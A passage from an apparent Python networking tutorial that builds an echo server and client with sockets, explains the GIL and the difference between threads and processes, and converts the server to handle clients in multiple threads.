bytes. The last thing that we want to be doing is handling a mixture of these in the rest of our program code, so we're going to carefully encode and decode the data at the boundary of our program, where the data enters and leaves the network. This will ensure that any functions in the rest of our code can assume that they'll be working with Python strings, which will later on make things much easier for us. Of course, not all the data that we may want to send or receive over a network will be text. For example, images, compressed files, and music, can't be decoded to a Unicode string, so a different kind of handling is needed. Usually this will involve loading the data into a class, such as a Python Image Library (PIL) image for example, if we are going to manipulate the object in some way. There are basic checks that could be done here on the received data, before performing full processing on it, to quickly flag any problems with the data. Some examples of such checks are as follows: Checking the length of the received data Checking the first few bytes of a file for a magic number to confirm a file type Checking values of higher level protocol headers, such as the Host header in an HTTP request This kind of checking will allow our application to fail fast if there is an obvious problem. The server itself Now, let's write our echo server. Open a new file called 1.1-echo-server-uni.py and save the following code in it: import tincanchat   HOST = tincanchat.HOST PORT = tincanchat.PORT   def handle_client(sock, addr):    """ Receive data from the client via sock and echo it back """    try:        msg = tincanchat.recv_msg(sock) # Blocks until received                                          # complete message        print('{}: {}'.format(addr, msg))        tincanchat.send_msg(sock, msg) # Blocks until sent    except (ConnectionError, BrokenPipeError):        print('Socket error')    finally:        print('Closed connection to {}'.format(addr))        sock.close()   if __name__ == '__main__':    listen_sock = tincanchat.create_listen_socket(HOST, PORT)    addr = listen_sock.getsockname()    print('Listening on {}'.format(addr))      while True:        client_sock, addr = listen_sock.accept()        print('Connection from {}'.format(addr))        handle_client(client_sock, addr) This is about as simple as a server can get! First, we set up our listening socket with the create_listen_socket() call. Second, we enter our main loop, where we listen forever for incoming connections from clients, blocking on listen_sock.accept(). When a client connection comes in, we invoke the handle_client() function, which handles the client as per our protocol. We've created a separate function for this code, partly to keep the main loop tidy, and partly because we'll want to reuse this set of operations in later programs. That's our server, now we just need to make a client to talk to it. A simple echo client Create a file called 1.2-echo_client-uni.py and save the following code in it: import sys, socket import tincanchat   HOST = sys.argv[-1] if len(sys.argv) > 1 else '127.0.0.1' PORT = tincanchat.PORT   if __name__ == '__main__':    while True:        try:            sock = socket.socket(socket.AF_INET,                                  socket.SOCK_STREAM)            sock.connect((HOST, PORT))            print('nConnected to {}:{}'.format(HOST, PORT))            print("Type message, enter to send, 'q' to quit")            msg = input()            if msg == 'q': break            tincanchat.send_msg(sock, msg) # Blocks until sent            print('Sent message: {}'.format(msg))            msg = tincanchat.recv_msg(sock) # Block until                                            # received complete                                              # message            print('Received echo: ' + msg)        except ConnectionError:            print('Socket error')            break        finally:            sock.close()            print('Closed connection to servern') If we're running our server on a different machine from the one on which we are running the client, then we can supply the IP address or the hostname of the server as a command line argument to the client program. If we don't, then it will default to trying to connect to the localhost. The third and forth lines of the code check the command line arguments for a server address. Once we've determined which server to connect to, we enter our main loop, which loops forever until we kill the client by entering q as a message. Within the main loop, we first create a connection to the server. Second, we prompt the user to enter the message to send and then we send the message using the tincanchat.send_msg() function. We then wait for the server's reply. Once we get the reply, we print it and then we close the connection as per our protocol. Give our client and server a try. Run the server in a terminal by using the following command: $ python 1.1-echo_server-uni.py Listening on ('0.0.0.0', 4040) In another terminal, run the client and note that you will need to specify the server if you need to connect to another computer, as shown here: $ python 1.2-echo_client.py 192.168.0.7 Type message, enter to send, 'q' to quit Running the terminals side by side is a good idea, because you can simultaneously see how the programs behave. Type a few messages into the client and see how the server picks them up and sends them back. Disconnecting with the client should also prompt a notification on the server. Concurrent I/O If you're adventurous, then you may have tried connecting to our server using more than one client at once. If you tried sending messages from both of them, then you'd have seen that it does not work as we might have hoped. If you haven't tried this, then give it a go. A working echo session on the client should look like this: Type message, enter to send. 'q' to quit hello world Sent message: hello world Received echo: hello world Closed connection to server However, when trying to send a message by using a second connected client, we'll see something like this: Type message, enter to send. 'q' to quit hello world Sent message: hello world The client will hang when the message is sent, and it won't get an echo reply. You may also notice that if we send a message by using the first connected client, then the second client will get its response. So, what's going on here? The problem is that the server can only listen for the messages from one client at a time. As soon as the first client connects, the server blocks at the socket.recv() call in tincanchat.recv_msg(), waiting for the first client to send a message. The server isn't able to receive messages from other clients while this is happening and so, when another client sends a message, that client blocks too, waiting for the server to send a reply. This is a slightly contrived example. The problem in this case could easily be fixed in the client end by asking the user for an input before establishing a connection to the server. However in our full chat service, the client will need to be able to listen for messages from the server while simultaneously waiting for user input. This is not possible in our present procedural setup. There are two solutions to this problem. We can either use more than one thread or process, or use non-blocking sockets along with an event-driven architecture. We're going to look at both of these approaches, starting with multithreading. Multithreading and multiprocessing Python has APIs that allow us to write both multithreading and multiprocessing applications. The principle behind multithreading and multiprocessing is simply to take copies of our code and run them in additional threads or processes. The operating system automatically schedules the threads and processes across available CPU cores to provide fair processing time allocation to all the threads and processes. This effectively allows a program to simultaneously run multiple operations. In addition, when a thread or process blocks, for example, when waiting for IO, the thread or process can be de-prioritized by the OS, and the CPU cores can be allocated to other threads or processes that have actual computation to do. Here is an overview of how threads and processes relate to each other: Threads exist within processes. A process can contain multiple threads but it always contains at least one thread, sometimes called the main thread. Threads within the same process share memory, so data transfer between threads is just a case of referencing the shared objects. Processes do not share memory, so other interfaces, such as files, sockets, or specially allocated areas of shared memory, must be used for transferring data between processes. When threads have operations to execute, they ask the operating system thread scheduler to allocate them some time on a CPU, and the scheduler allocates the waiting threads to CPU cores based on various parameters, which vary from OS to OS. Threads in the same process may run on separate CPU cores at the same time. Although two processes have been displayed in the preceding diagram, multiprocessing is not going on here, since the processes belong to different applications. The second process is displayed to illustrates a key difference between Python threading and threading in most other programs. This difference is the presence of the GIL. Threading and the GIL The CPython interpreter (the standard version of Python available for download from www.python.org) contains something called the Global Interpreter Lock (GIL). The GIL exists to ensure that only a single thread in a Python process can run at a time, even if multiple CPU cores are present. The reason for having the GIL is that it makes the underlying C code of the Python interpreter much easier to write and maintain. The drawback of this is that Python programs using multithreading cannot take advantage of multiple cores for parallel computation. This is a cause of much contention; however, for us this is not so much of a problem. Even with the GIL present, threads that are blocking on I/O are still de-prioritized by the OS and put into the background, so threads that do have computational work to do can run instead. The following figure is a simplified illustration of this: The Waiting for GIL state is where a thread has sent or received some data and so is ready to come out of the blocking state, but another thread has the GIL, so the ready thread is forced to wait. In many network applications, including our echo and chat servers, the time spent waiting on I/O is much higher than the time spent processing data. As long as we don't have a very large number of connections (a situation we'll discuss later on when we come to event driven architectures), thread contention caused by the GIL is relatively low, and hence threading is still a suitable architecture for these network server applications. With this in mind, we're going to use multithreading rather than multiprocessing in our echo server. The shared data model will simplify the code that we'll need for allowing our chat clients to exchange messages with each other, and because we're I/O bound, we don't need processes for parallel computation. Another reason for not using processes in this case is that processes are more "heavyweight" in terms of the OS resources, so creating a new process takes longer than creating a new thread. Processes also use more memory. One thing to note is that if you need to perform an intensive computation in your network server application (maybe you need to compress a large file before sending it over the network), then you should investigate methods for running this in a separate process. Because of quirks in the implementation of the GIL, having even a single computationally intensive thread in a mainly I/O bound process when multiple CPU cores are available can severely impact the performance of all the I/O bound threads. For more details, go through the David Beazley presentations linked to in the following information box: Processes and threads are different beasts, and if you're not clear on the distinctions, it's worthwhile to read up. A good starting point is the Wikipedia article on threads, which can be found at http://en.wikipedia.org/wiki/Thread_(computing). A good overview of the topic is given in Chapter 4 of Benjamin Erb's thesis, which is available at http://berb.github.io/diploma-thesis/community/. Additional information on the GIL, including the reasoning behind keeping it in Python can be found in the official Python documentation at https://wiki.python.org/moin/GlobalInterpreterLock. You can also read more on this topic in Nick Coghlan's Python 3 Q&A, which can be found at http://python-notes.curiousefficiency.org/en/latest/python3/questions_and_answers.html#but-but-surely-fixing-the-gil-is-more-important-than-fixing-unicode. Finally, David Beazley has done some fascinating research on the performance of the GIL on multi-core systems. Two presentations of importance are available online. They give a good technical background, which is relevant to this article. These can be found at http://pyvideo.org/video/353/pycon-2010--understanding-the-python-gil---82 and at https://www.youtube.com/watch?v=5jbG7UKT1l4. A multithreaded echo server A benefit of the multithreading approach is that the OS handles the thread switches for us, which means we can continue to write our program in a procedural style. Hence we only need to make small adjustments to our server program to make it multithreaded, and thus, capable of handling multiple clients simultaneously. Create a new file called 1.3-echo_server-multi.py and add the following code to it: import threading import tincanchat   HOST = tincanchat.HOST PORT = tincanchat.PORT   def handle_client(sock, addr):    """ Receive one message and echo it back to client, then close        socket """    try:        msg = tincanchat.recv_msg(sock) # blocks until received                                          # complete message        msg = '{}: {}'.format(addr, msg)        print(msg)        tincanchat.send_msg(sock, msg) # blocks until sent    except (ConnectionError, BrokenPipeError):        print('Socket error')    finally:        print('Closed connection to {}'.format(addr))        sock.close()   if __name__ == '__main__':    listen_sock = tincanchat.create_listen_socket(HOST, PORT)    addr = listen_sock.getsockname()    print('Listening on {}'.format(addr))      while True:        client_sock,addr = listen_sock.accept()        # Thread will run function handle_client() autonomously        # and concurrently to this while loop        thread = threading.Thread(target=handle_client,                                  args=[client_sock, addr],                                  daemon=True)        thread.start()        print('Connection from {}'.format(addr)) You can see that we've just imported an extra module and modified our main loop to run our handle_client() function in separate threads, rather than running it in the main thread. For each client that connects, we create a new thread that just runs the handle_client() function. When the thread blocks on a receive or send, the OS checks the other threads to see if they have come out of a blocking state, and if any have, then it switches to one of them. Notice that we have set the daemon argument in the thread constructor call to True. This will allow the program to exit if we hit ctrl - c without us having to explicitly close all of our threads first. If you try this echo server with multiple clients, then you'll see that a second client that connects and sends a message will immediately get a response. Summary We looked at how to develop network protocols while considering aspects such as the connection sequence, framing of the data on the wire, and the impact these choices will have on the architecture of the client and server programs. We worked through different architectures for network servers and clients, demonstrating the multithreaded models by writing a simple echo server. Resources for Article: Further resources on this subject: Importing Dynamic Data [article] Driving Visual Analyses with Automobile Data (Python) [article] Preparing to Build Your Own GIS Application [article]
Read more
  • 0
  • 0
  • 10661
Modal Close icon
Modal Close icon